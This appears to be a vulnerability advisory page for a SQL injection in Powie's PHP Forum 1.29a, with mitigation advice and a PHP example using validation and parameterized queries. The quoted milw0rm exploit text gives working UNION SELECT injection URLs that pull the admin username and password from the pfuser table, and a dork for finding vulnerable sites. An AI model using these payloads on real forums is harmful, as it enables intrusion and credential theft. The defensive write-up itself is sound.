Vendor: PForum
By: SHiKaA
CVSS: N/A
CWE: 89 (SQL Injection)
Product Name: PForum
Affected Version From: v1.29a
Affected Version To: v1.29a
Patch Exists: NO
Related CWE: N/A
CPE: a:powie:pforum:1.29a
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Powie’s PHP Forum <= v1.29a (editpoll) Remote SQL Injection Exploit

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'editpoll.php' script, which receives it through the `id` request parameter. A remote attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable script and execute arbitrary SQL commands in the application's database. This can be exploited to bypass authentication and gain access to the administrative panel.

Mitigation:

Input validation should be used to prevent SQL injection attacks. It is also recommended to use parameterized queries instead of dynamic SQL queries.
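
The two mitigations above, applied together to an integer `id` parameter. This is an added example, not PForum's code: the `pfpoll` table, its columns, and the `loadPoll()` helper are assumptions, and the database is a constructed in-memory SQLite instance.

```php
<?php
declare(strict_types=1);

// Added example. The table name "pfpoll" and its columns are assumptions;
// the page only shows that the affected query returns four columns.
$db = new PDO('sqlite::memory:');   // constructed in-memory database
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pfpoll (id INTEGER PRIMARY KEY, topic_id INTEGER, question TEXT, closed INTEGER)');
$db->exec("INSERT INTO pfpoll VALUES (1, 10, 'Favourite editor?', 0)");

/**
 * Validate the id parameter, then look the poll up with a bound parameter.
 * Returns the row as an array, or null when the id is invalid or unknown.
 */
function loadPoll(PDO $db, $rawId): ?array
{
    // Layer 1: input validation. Only a positive decimal integer passes;
    // arrays, empty strings and anything with trailing text are rejected.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // Layer 2: parameterized query. The value is sent as data, never as SQL text,
    // so it cannot change the structure of the statement.
    $stmt = $db->prepare('SELECT id, topic_id, question, closed FROM pfpoll WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: a valid id, an unknown id, and the id value quoted in the advisory.
$inputs = ['1', '999', '-1 UNION SELECT null,null,username,null FROM pfuser where id=1'];
foreach ($inputs as $raw) {
    $poll = loadPoll($db, $raw);
    echo str_pad(substr($raw, 0, 24), 26),
         $poll === null ? 'rejected / not found' : $poll['question'],
         PHP_EOL;
}
```

Only the first input returns a row. The advisory's `id` value fails integer validation before any query is built, and the bound parameter remains as a second layer if validation is ever loosened.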

Exploit-DB raw data:

#==============================================================================================
#Powie's PHP Forum <= v1.29a (editpoll) Remote SQL Injection Exploit
#===============================================================================================
#                                                                     
#Critical Level : Dangerous                                           
#                                                                     
#Vendor site : http://www.powie.de
#                                                                     
#Version : v1.29a
#
#===============================================================================================
#
#DORK : "pForum 1.29a"  // ""Powie's PSCRIPT Forum 1.26"                                        
#                                                       
#
#Exploit :
#--------------------------------
#
#FOR USER : editpoll.php?id=-1 UNION SELECT null,null,username,null FROM pfuser where id=1
#FOR PASS : editpoll.php?id=-1 UNION SELECT null,null,pwd,null FROM pfuser where id=1
#
#================================================================================================
#Discovered By : SHiKaA
#
#Contact : SHiKaA-[at]hotmail.com
#
#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo
# sPECial THanks to : CaMpA , Coder-AZH@CKTEAM
==================================================================================================

# milw0rm.com [2006-11-17]